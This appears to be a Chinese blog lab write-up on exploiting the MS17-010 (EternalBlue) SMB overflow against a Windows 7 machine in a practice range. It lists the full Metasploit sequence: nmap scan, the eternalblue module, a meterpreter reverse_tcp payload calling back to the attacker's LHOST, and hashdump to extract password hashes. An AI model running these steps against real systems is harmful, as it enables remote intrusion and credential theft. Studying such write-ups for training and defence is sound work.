MS17-010远程溢出(CVE-2017-0143)

漏洞介绍

MS17-010漏洞出现在Windows SMB v1中的内核态函数srv!SrvOs2FeaListToNt在处理FEA(File Extended Attributes)转换时,在大非分页池(Large Non-Paged Kernel Pool)上存在缓冲区溢出。
函数srv!SrvOs2FeaListToNt在将FEA list转换成NTFEA(Windows NT FEA) list前会调用。srv!SrvOs2FeaListSizeToNt去计算转换后的FEA lsit的大小,因计算大小错误,而导致缓冲区溢出。

实验环境

这里我用的是安界网的靶场

kali192.168.0.3
Windows7192.168.0.2

漏洞利用

打开nmap对目标机进行扫描

nmap  -sV -Pn 192.168.0.2

目标机开放了135、139、445等端口,系统为win7
然后我们打开msf

msfconsole

打开 metasploite 命令行客户端,使用search命令查找ms17-010漏洞的相关模块

search ms17-010

由于这是靶场所以我们直接利用

use exploit/windows/smb/ms17_010_eternalblue

查看配置信息,并设置标记为yes的属性

show options

设置攻击目标机的IP地址

set RHOSTS 192.168.0.2

之后,选择载荷payload,也就是shellcode,此处我们选择回连至控制端shell的payload

set payload  windows/x64/meterpreter/reverse_tcp

同样,载荷也需要进行配置,show options查看配置信息
配置中缺少本地主机 LHOST,设置一下

set LHOST 192.168.0.3

完成配置后,运行exploit或者run,开始执行漏洞利用模块

run

成功获取来自目标主机的Session会话

我们已经成功的获取Session会话了,本次我们继续介绍meterpreter后渗透模块的其他功能
运行sysinfo查看目标机器相关信息

sysinfo

执行help命令可以帮助我们了解meterpreter有哪些功能

help

接下来,我们获取目标机hash值
执行hashdump

hashdump

总结

又是朴素而又充实的一天!

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值